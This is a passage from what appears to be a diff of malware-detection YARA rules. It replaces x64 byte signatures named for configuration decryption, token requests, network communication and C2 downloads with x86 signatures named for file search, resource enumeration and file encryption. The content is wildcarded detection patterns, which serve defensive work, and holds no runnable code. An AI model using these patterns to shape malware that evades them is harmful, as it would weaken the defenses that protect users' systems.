-            ?? ?? E8 ?? ?? ?? ?? 4C 8B E8 8B FE E8 ?? ?? ?? ?? 48 89 44 24 ?? 48 8B E8 48 85 C0
-            0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
-            D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
-            D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ?? ?? 48 85 C0 0F
-            84 ?? ?? ?? ?? 45 33 C9 48 89 74 24 ?? C7 44 24 ?? ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8B
-            CD C7 44 24 ?? ?? ?? ?? ?? 45 8D 41 ?? FF D0 48 89 44 24 ?? 48 8B F8 48 83 F8 ?? 0F
-            84 ?? ?? ?? ?? 4C 89 A4 24 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 4C 89 B4 24 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85 C0 74 ?? 33 D2 48 8B CF FF D0 44 8B E0 EB
-            ?? 44 8B E6 89 74 24 ?? FF 15 ?? ?? ?? ?? 45 8B C4 BA ?? ?? ?? ?? 48 8B C8 FF 15 ??
-            ?? ?? ?? 48 8D 0D ?? ?? ?? ?? 4C 8B F0 E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
-            D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
-            D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85 C0
-            74 ?? 4C 8D 4C 24 ?? 48 89 74 24 ?? 45 8B C4 49 8B D6 48 8B CF FF D0 8B FE 45 85 E4
-            0F 84 ?? ?? ?? ?? 0F 1F 40 ?? 66 66 0F 1F 84 00 ?? ?? 00 00 44 8B C6 48 8D 54 24
-        }
-		$decrypt_configuration_p2 = {
-            0F 1F 84 00 ?? ?? ?? ?? 0F B6 0A 8B C7 FF C7 42 3A 0C 30 0F 85 ?? ?? ?? ?? 41 FF C0
-            48 FF C2 41 83 F8 ?? 72 ?? 83 FF ?? 0F 84 ?? ?? ?? ?? 42 8B 2C 37 4C 89 BC 24 ?? ??
-            ?? ?? 8D 5D ?? FF 15 ?? ?? ?? ?? 44 8B C3 BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ??
-            48 8B D8 85 ED 74 ?? 8D 47 ?? 03 C5 41 3B C4 73 ?? 49 8D 56 ?? 44 8B C5 48 03 D7 48
-            8B CB E8 ?? ?? ?? ?? 4C 8B BC 24 ?? ?? ?? ?? 49 C7 C0 ?? ?? ?? ?? 66 90 49 FF C0 43
-            38 34 28 75 ?? 85 ED 7E ?? 4C 8B CB 8B C6 4D 8D 49 ?? 99 FF C6 41 F7 F8 48 63 C2 42
-            0F B6 14 28 41 30 51 ?? 3B F5 7C ?? 48 8B 4C 24 ?? 4C 8B C5 48 8B D3 E8 ?? ?? ?? ??
-            48 8B 6C 24 ?? BE ?? ?? ?? ?? EB ?? 41 3B FC 0F 82 ?? ?? ?? ?? 48 8B DE 4C 8B A4 24
-            ?? ?? ?? ?? 4D 85 F6 74 ?? FF 15 ?? ?? ?? ?? 4D 8B C6 33 D2 48 8B C8 FF 15 ?? ?? ??
-            ?? 4C 8B B4 24 ?? ?? ?? ?? 48 85 DB 74 ?? FF 15 ?? ?? ?? ?? 4C 8B C3 33 D2 48 8B C8
-            FF 15 ?? ?? ?? ?? 48 8B 7C 24 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ??
-            ?? ?? ?? 4C 8B AC 24 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B
-            D0 48 8B CB E8 ?? ?? ?? ?? 48 8B 9C 24 ?? ?? ?? ?? 48 85 C0 74 ?? 48 8B CF FF D0 48
-            8B BC 24 ?? ?? ?? ?? 48 85 ED 74 ?? FF 15 ?? ?? ?? ?? 4C 8B C5 33 D2 48 8B C8 FF 15
-            ?? ?? ?? ?? 8B C6 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ?? ?? 48 81 C4 ?? ?? ?? ?? 5E 5D
-            C3
-        }
-		$decryption_algorithm = {
-            40 53 48 83 EC ?? 0F B6 01 48 8B D9 84 C0 0F 84 ?? ?? ?? ?? 48 FF C3 48 89 7C 24 ??
-            4C 8B C9 8B F8 3C ?? 72 ?? 83 E7 ?? B9 ?? ?? ?? ?? 0F 1F 00 0F B6 13 48 FF C3 8B C2
-            83 E0 ?? D3 E0 83 C1 ?? 0B F8 80 FA ?? 73 ?? 33 C0 4C 8B C3 4D 2B C1 4C 3B CB 4C 0F
-            47 C0 4D 85 C0 74 ?? 33 D2 49 8B C9 E8 ?? ?? ?? ?? 8B C7 99 83 E2 ?? 03 C2 C1 F8 ??
-            85 C0 7E ?? 48 89 74 24 ?? 48 8B FB 8B F0 66 90 48 8B D7 E8 ?? ?? ?? ?? 48 83 C7 ??
-            48 83 EE ?? 75 ?? 48 8B 74 24 ?? 48 8B C3 48 8B 7C 24 ?? 48 83 C4 ?? 5B C3 48 8B 7C
-            24 ?? 48 8B C3 48 83 C4 ?? 5B C3
-        }
-		$request_access_token_p1 = {
-            40 53 55 56 57 41 54 41 55 41 56 41 57 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48
-            33 C4 48 89 84 24 ?? ?? ?? ?? 33 C0 4C 89 4C 24 ?? 33 FF 48 89 44 24 ?? 0F 57 C0 89
-            7C 24 ?? 48 C7 C3 ?? ?? ?? ?? 8B F7 49 8B E8 4C 8B FA 4C 8B F1 48 8B C3 0F 11 44 24
-            ?? 48 FF C0 42 38 34 00 75 ?? 48 8B CB 48 FF C1 40 38 34 0A 75 ?? 48 03 C1 48 8B CB
-            48 FF C1 41 38 34 0E 75 ?? 48 03 C1 4C 8D 24 C5 ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 4D 8B
-            C4 BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 4C 8B E8 48 85 C0 74 ?? 48 89 6C 24 ??
-            4C 8D 05 ?? ?? ?? ?? 4D 8B CE 4C 89 7C 24 ?? 49 8B D4 48 8B C8 E8 ?? ?? ?? ?? 4C 8D
-            0D ?? ?? ?? ?? 4C 8D 05 ?? ?? ?? ?? 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ?? E8 ?? ?? ??
-            ?? 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4C 24 ?? 41 B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 48
-            8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B E8 48 85 C0 75 ?? 48
-            8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B E8 48 8D 0D ?? ?? ??
-            ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CD FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48
-            8B 6C 24 ?? 48 8D 15 ?? ?? ?? ?? 48 8B CD 41 B9 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? FF D0
+		$search_files_p1 = {
+            8B FF 55 8B EC 51 8B 4D ?? 8D 51 ?? 8A 01 41 84 C0 75 ?? 57 8B 7D ?? 2B CA 8B C7 41
+            F7 D0 89 4D ?? 3B C8 76 ?? 6A ?? 58 EB ?? 53 56 8D 5F ?? 03 D9 6A ?? 53 E8 ?? ?? ??
+            ?? 8B F0 59 59 85 FF 74 ?? 57 FF 75 ?? 53 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? FF
+            75 ?? 2B DF 8D 04 3E FF 75 ?? 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8B 5D ?? 8B
+            CB E8 ?? ?? ?? ?? 33 FF 89 45 ?? 85 C0 74 ?? 56 E8 ?? ?? ?? ?? 8B 75 ?? 59 EB ?? 8B
+            43 ?? 89 30 8B F7 83 43 ?? ?? 57 E8 ?? ?? ?? ?? 59 8B C6 5E 5B 5F 8B E5 5D C3 33 FF
+            57 57 57 57 57 E8 ?? ?? ?? ?? CC 8B FF 55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33
+            C5 89 45 ?? 8B 4D ?? 53 8B 5D ?? 57 8B 7D ?? 89 9D ?? ?? ?? ?? EB ?? 8A 01 3C ?? 74
+            ?? 3C ?? 74 ?? 3C ?? 74 ?? 51 57 E8 ?? ?? ?? ?? 59 59 8B C8 3B CF 75 ?? 8A 11 80 FA
+            ?? 75 ?? 8D 47 ?? 3B C8 74 ?? 53 33 DB 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? EB ?? 33 DB
         }
-		$request_access_token_p2 = {
-            85 C0 0F 84 ?? ?? ?? ?? 49 8B D5 48 8B CD E8 ?? ?? ?? ?? 48 8B F0 48 85 C0 0F 84 ??
-            ?? ?? ?? 48 8B D3 66 90 48 FF C2 40 38 3C 10 75 ?? 48 FF C2 48 8B C8 E8 ?? ?? ?? ??
-            4C 8B F0 48 85 C0 74 ?? 48 8D 15 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B E8 48 85
-            C0 74 ?? 83 78 ?? ?? 75 ?? 48 8B 48 ?? 48 8B FB 80 7C 39 ?? ?? 48 8D 7F ?? 75 ?? FF
-            15 ?? ?? ?? ?? 4C 8D 47 ?? BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48 8B 55 ?? 4C
-            8B C3 48 8B F8 0F 1F 00 49 FF C0 42 80 3C 02 ?? 75 ?? 49 FF C0 48 8B C8 E8 ?? ?? ??
-            ?? 49 8B CE E8 ?? ?? ?? ?? 48 85 FF 74 ?? 80 7C 1F ?? ?? 48 8D 5B ?? 75 ?? 48 8D 53
-            ?? 48 8B CF E8 ?? ?? ?? ?? 48 8B 4C 24 ?? BB ?? ?? ?? ?? 48 89 01 EB ?? 8B 5C 24 ??
-            EB ?? 8B DF EB ?? 8B DE 48 8D 4C 24 ?? E8 ?? ?? ?? ?? 4D 85 ED 74 ?? FF 15 ?? ?? ??
-            ?? 4D 8B C5 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 85 F6 74 ?? FF 15 ?? ?? ?? ?? 4C 8B
-            C6 33 D2 48 8B C8 FF 15 ?? ?? ?? ?? 48 85 FF 74 ?? FF 15 ?? ?? ?? ?? 4C 8B C7 33 D2
-            48 8B C8 FF 15 ?? ?? ?? ?? 8B C3 48 8B 8C 24 ?? ?? ?? ?? 48 33 CC E8 ?? ?? ?? ?? 48
-            81 C4 ?? ?? ?? ?? 41 5F 41 5E 41 5D 41 5C 5F 5E 5D 5B C3
+		$search_files_p2 = {
+            80 FA ?? 74 ?? 80 FA ?? 74 ?? 8A C3 80 FA ?? 75 ?? B0 ?? 0F B6 C0 2B CF 41 F7 D8 56
+            1B C0 23 C1 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53 50 E8 ?? ?? ?? ??
+            83 C4 ?? 8D 85 ?? ?? ?? ?? 53 53 53 50 53 57 FF 15 ?? ?? ?? ?? 8B F0 8B 85 ?? ?? ??
+            ?? 83 FE ?? 75 ?? 50 53 53 57 E8 ?? ?? ?? ?? 83 C4 ?? 8B D8 83 FE ?? 74 ?? 56 FF 15
+            ?? ?? ?? ?? 8B C3 5E 8B 4D ?? 5F 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3 8B 48 ?? 2B 08
+            C1 F9 ?? 89 8D ?? ?? ?? ?? 80 BD ?? ?? ?? ?? ?? 75 ?? 8A 8D ?? ?? ?? ?? 84 C9 74 ??
+            80 F9 ?? 75 ?? 38 9D ?? ?? ?? ?? 74 ?? 50 FF B5 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 57 50
+            E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 75 ?? 8D 85 ?? ?? ?? ?? 50 56 FF 15 ?? ?? ?? ?? 85 C0
+            8B 85 ?? ?? ?? ?? 75 ?? 8B 10 8B 40 ?? 8B 8D ?? ?? ?? ?? 2B C2 C1 F8 ?? 3B C8 0F 84
+            ?? ?? ?? ?? 68 ?? ?? ?? ?? 2B C1 6A ?? 50 8D 04 8A 50 E8 ?? ?? ?? ?? 83 C4 ?? E9
         }
-		$network_communication_p1 = {
-            40 53 56 57 41 54 41 56 41 57 48 83 EC ?? 48 8B 05 ?? ?? ?? ?? 48 33 C4 48 89 44 24
-            ?? 8B 35 ?? ?? ?? ?? 48 8B F9 48 8D 0D ?? ?? ?? ?? 4D 8B E1 4D 8B F8 4C 8B F2 E8 ??
-            ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? 48 89 6C 24 ?? E8 ??
-            ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 33 DB 48 85 C0 0F 84 ?? ?? ?? ?? 45 33
-            C9 89 5C 24 ?? 45 33 C0 48 8D 0D ?? ?? ?? ?? 8B D6 FF D0 48 89 07 48 8B E8 48 85 C0
-            0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
-            F0 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B
-            F0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CE FF 15 ?? ?? ?? ?? 48 85 C0
-            0F 84 ?? ?? ?? ?? 41 B8 ?? ?? ?? ?? 45 33 C9 49 8B D6 48 8B CD FF D0 48 89 47 ?? 48
+		$enum_rsrc = {
+            6A ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 4D ?? 8B 45 ?? 8D 4D ?? 83 4D ?? ?? 51 50 6A
+            ?? 6A ?? 6A ?? C7 45 ?? ?? ?? ?? ?? FF 15 ?? ?? ?? ?? 85 C0 0F 85 ?? ?? ?? ?? FF 75
+            ?? 6A ?? FF 15 ?? ?? ?? ?? 8B F0 85 F6 0F 84 ?? ?? ?? ?? EB ?? 33 DB 39 5D ?? 7E ??
+            8D 7E ?? F7 47 ?? ?? ?? ?? ?? 74 ?? 8D 47 ?? 89 45 ?? 8B 45 ?? 8B 00 8B 48 ?? 85 C9
+            74 ?? 8B 01 8D 55 ?? 52 FF 50 ?? EB ?? FF 37 8D 4D ?? E8 ?? ?? ?? ?? 83 65 ?? ?? 8D
+            45 ?? 50 8B 45 ?? 8B 48 ?? E8 ?? ?? ?? ?? 83 4D ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 43 83
+            C7 ?? 3B 5D ?? 7C ?? 83 4D ?? ?? C7 45 ?? ?? ?? ?? ?? 8D 45 ?? 50 56 8D 45 ?? 50 FF
+            75 ?? FF 15 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 56 FF 15 ?? ?? ?? ?? FF 75 ?? FF 15
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? C2 ?? ?? E8 ?? ?? ?? ?? CC 55 8B EC 6A ?? 68 ?? ?? ?? ??
+            64 A1 ?? ?? ?? ?? 50 56 A1 ?? ?? ?? ?? 33 C5 50 8D 45 ?? 64 A3 ?? ?? ?? ?? 8B F1 83
+            65 ?? ?? 8B 4E ?? 85 C9 74 ?? 8B 11 3B CE 0F 95 C0 0F B6 C0 50 FF 52 ?? 83 66 ?? ??
+            8B 4D ?? 64 89 0D ?? ?? ?? ?? 59 5E 8B E5 5D C3
         }
-		$network_communication_p2 = {
-            8B E8 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ??
-            ?? ?? ?? 48 8B F0 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ??
-            ?? ?? ?? 48 8B F0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CE FF 15 ?? ??
-            ?? ?? 48 85 C0 74 ?? C7 44 24 ?? ?? ?? ?? ?? 45 33 C9 48 89 5C 24 ?? 4D 8B C7 49 8B
-            D4 48 89 5C 24 ?? 48 8B CD FF D0 48 8B D8 48 8D 0D ?? ?? ?? ?? 48 89 5F ?? C7 44 24
-            ?? ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B F8 48 85 C0 75 ?? 48 8D
-            0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B F8 48 8D 0D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8B D0 48 8B CF FF 15 ?? ?? ?? ?? 48 85 C0 74 ?? 41 B9 ?? ?? ?? ??
-            4C 8D 44 24 ?? 48 8B CB 41 8D 51 ?? FF D0 B8 ?? ?? ?? ?? EB ?? 48 89 5F ?? EB ?? 48
-            89 1F 33 C0 48 8B 6C 24 ?? 48 8B 4C 24 ?? 48 33 CC E8 ?? ?? ?? ?? 48 83 C4 ?? 41 5F
-            41 5E 41 5C 5F 5E 5B C3
+		$create_test_file_p1 = {
+            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 51 8D 4D ?? E8 ?? ?? ?? ?? 33 DB 8D 55
+            ?? 68 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 89 5D ?? E8 ?? ?? ?? ?? 59 8D 45 ?? C6 45 ?? ??
+            50 8D 4D ?? 89 5D ?? 89 5D ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 8D 4D ?? C6 45 ?? ?? E8
+            ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 83 CB ?? 8B 3D ?? ?? ?? ?? E9 ?? ?? ?? ?? 83 65 ?? ??
+            8D 4D ?? 83 65 ?? ?? 56 E8 ?? ?? ?? ?? C6 45 ?? ?? 8D 4D ?? FF 75 ?? 8B 45 ?? 2B 45
+            ?? 50 8D 45 ?? 50 E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 8B 55 ?? 8D 4D ?? 0F 43 45 ??
+            83 7D ?? ?? 0F 43 4D ?? 3B 55 ?? 75 ?? 52 50 51 E8 ?? ?? ?? ?? 83 C4 ?? C6 85 ?? ??
+            ?? ?? ?? 85 C0 74 ?? C6 85 ?? ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 80 BD ?? ?? ?? ??
+            ?? 8D 4D ?? 0F 85 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 C6 ?? 3B F7 0F 85 ?? ??
+            ?? ?? 83 7D ?? ?? 8D 45 ?? 8B 35 ?? ?? ?? ?? BF ?? ?? ?? ?? 0F 43 45 ?? 33 C9 51 57
         }
-		$download_data_from_c2_p1 = {
-            4C 8B DC 55 56 57 49 8D AB ?? ?? ?? ?? 48 81 EC ?? ?? ?? ?? 48 8B 05 ?? ?? ?? ?? 48
-            33 C4 48 89 85 ?? ?? ?? ?? 49 89 5B ?? 33 FF 4D 89 63 ?? 48 8B D9 4D 89 6B ?? 48 8D
-            0D ?? ?? ?? ?? 4D 8B E8 4D 89 73 ?? 0F 57 C0 4D 89 7B ?? 33 C0 4C 8D 67 ?? 4D 8B C1
-            48 89 44 24 ?? 0F 11 44 24 ?? 8B F7 E8 ?? ?? ?? ?? 48 89 44 24 ?? 4C 8B F8 48 85 C0
-            0F 84 ?? ?? ?? ?? 4C 8D 0D ?? ?? ?? ?? 4C 8B C0 48 8D 15 ?? ?? ?? ?? 48 8D 4C 24 ??
-            E8 ?? ?? ?? ?? 85 C0 0F 84 ?? ?? ?? ?? 33 D2 48 8D 4D ?? 41 B8 ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 4C 8B CB 4C 8D 05 ?? ?? ?? ?? BA ?? ?? ?? ?? 48 8D 4D ?? E8 ?? ?? ?? ?? 48 8D
-            45 ?? 49 8B DC 0F 1F 80 ?? ?? ?? ?? 48 FF C3 66 39 34 58 75 ?? 48 8D 0D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 4C 8B F0 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 4C 8B F0 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            48 8B D0 49 8B CE FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 4C 8B 7C 24 ?? 48 8D
-            55 ?? 49 8B CF 41 B9 ?? ?? ?? ?? 44 8B C3 FF D0 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 48 8B D0 48 8B CB E8 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 7C 24 ??
-            45 33 C9 C7 44 24 ?? ?? ?? ?? ?? 45 33 C0 BA ?? ?? ?? ?? C7 44 24 ?? ?? ?? ?? ?? 49
-            8B CD FF D0 4C 8B E0 48 83 F8 ?? 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48
+		$create_test_file_p2 = {
+            6A ?? 51 51 68 ?? ?? ?? ?? 50 FF D6 3B C3 0F 84 ?? ?? ?? ?? 50 FF 15 ?? ?? ?? ?? 83
+            7D ?? ?? 8D 45 ?? 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 45 ?? 0F 43 45 ??
+            33 C9 51 57 6A ?? 51 51 68 ?? ?? ?? ?? 50 FF D6 8B F8 3B FB 0F 84 ?? ?? ?? ?? 6A ??
+            57 FF 15 ?? ?? ?? ?? 8B F0 85 F6 75 ?? 57 FF 15 ?? ?? ?? ?? E9 ?? ?? ?? ?? E8 ?? ??
+            ?? ?? E9 ?? ?? ?? ?? 6A ?? 58 3B F0 0F 42 F0 03 F0 56 E8 ?? ?? ?? ?? 59 6A ?? 89 85
+            ?? ?? ?? ?? 8D 45 ?? 50 56 8B B5 ?? ?? ?? ?? 56 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 75
+            ?? 57 FF 15 ?? ?? ?? ?? EB ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 8D 55 ?? 50
+            8B CE E8 ?? ?? ?? ?? 59 59 33 DB 53 53 53 57 FF 15 ?? ?? ?? ?? 53 8D 45 ?? 50 FF 75
+            ?? 56 57 FF 15 ?? ?? ?? ?? 57 FF 15 ?? ?? ?? ?? 83 7D ?? ?? 8D 4D ?? 8D 45 ?? 0F 43
+            4D ?? 83 7D ?? ?? 51 0F 43 45 ?? 50 FF 15 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 8D 4D ??
+            E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B C3 E8 ??
+            ?? ?? ?? C3
         }
-		$download_data_from_c2_p2 = {
-            8B CB FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 89 7C 24 ?? 45 33 C9 89 7C 24
-            ?? 45 33 C0 33 D2 89 7C 24 ?? 49 8B CF FF D0 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ??
-            ?? ?? 89 7C 24 ?? 89 7C 24 ?? 89 7C 24 ?? 89 7C 24 ?? C7 44 24 ?? ?? ?? ?? ?? 89 7C
-            24 ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 33 D2 49 8B CF
-            FF D0 85 C0 0F 84 ?? ?? ?? ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ??
-            ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ??
-            ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ??
-            ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 4C 24 ?? 45 33 C0 48 89 4C 24 ?? 4C 8D 4C 24 ??
-            48 8D 4C 24 ?? BA ?? ?? ?? ?? 48 89 4C 24 ?? 49 8B CF FF D0 85 C0 0F 84 ?? ?? ?? ??
-            8B 5C 24 ?? FF 15 ?? ?? ?? ?? 44 8B C3 BA ?? ?? ?? ?? 48 8B C8 FF 15 ?? ?? ?? ?? 48
-            8B F0 48 85 C0 0F 84 ?? ?? ?? ?? 90 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8
-            ?? ?? ?? ?? 48 8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8
-            ?? ?? ?? ?? 48 8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ??
-            ?? ?? ?? 48 85 C0 0F 84 ?? ?? ?? ?? 48 8D 54 24 ?? 49 8B CF FF D0 85 C0 0F 84 ?? ??
-            ?? ?? 44 8B 74 24 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48
+		$encrypt_files_p1 = {
+            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 33 F6 8D 4D ?? 89 B5
+            ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 75 ?? 8D 4D ?? 68 ?? ?? ?? ?? 89 75 ?? 89 75 ?? E8 ??
+            ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? E8 ?? ?? ?? ?? 83 7D ?? ?? 8D 7D ?? 8B D8 8B 45
+            ?? 0F 43 7D ?? 59 3B D8 77 ?? 85 DB 74 ?? 2B C3 40 03 C7 89 85 ?? ?? ?? ?? 2B C7 50
+            6A ?? 57 EB ?? 53 68 ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74 ?? 8B 85 ?? ??
+            ?? ?? 46 2B C6 50 6A ?? 56 E8 ?? ?? ?? ?? 8B F0 83 C4 ?? 85 F6 75 ?? EB ?? 2B F7 EB
+            ?? 83 CE ?? 83 FE ?? 74 ?? 83 7D ?? ?? 8D 45 ?? FF 75 ?? 0F 43 45 ?? 50 51 56 8D 4D
+            ?? E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? 33 F6 8D 85 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? C7 85
+            ?? ?? ?? ?? ?? ?? ?? ?? 83 C4 ?? C6 45 ?? ?? 8D 85 ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ??
+            ?? ?? ?? 8D 8D ?? ?? ?? ?? C7 85 ?? ?? ?? ?? ?? ?? ?? ?? C7 85
         }
-		$download_data_from_c2_p3 = {
-            8B D8 48 85 C0 75 ?? 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B C8 E8 ?? ?? ?? ?? 48
-            8B D8 48 8D 0D ?? ?? ?? ?? E8 ?? ?? ?? ?? 48 8B D0 48 8B CB FF 15 ?? ?? ?? ?? 48 85
-            C0 0F 84 ?? ?? ?? ?? 4C 8D 4C 24 ?? 45 8B C6 48 8B D6 49 8B CF FF D0 85 C0 74 ?? 44
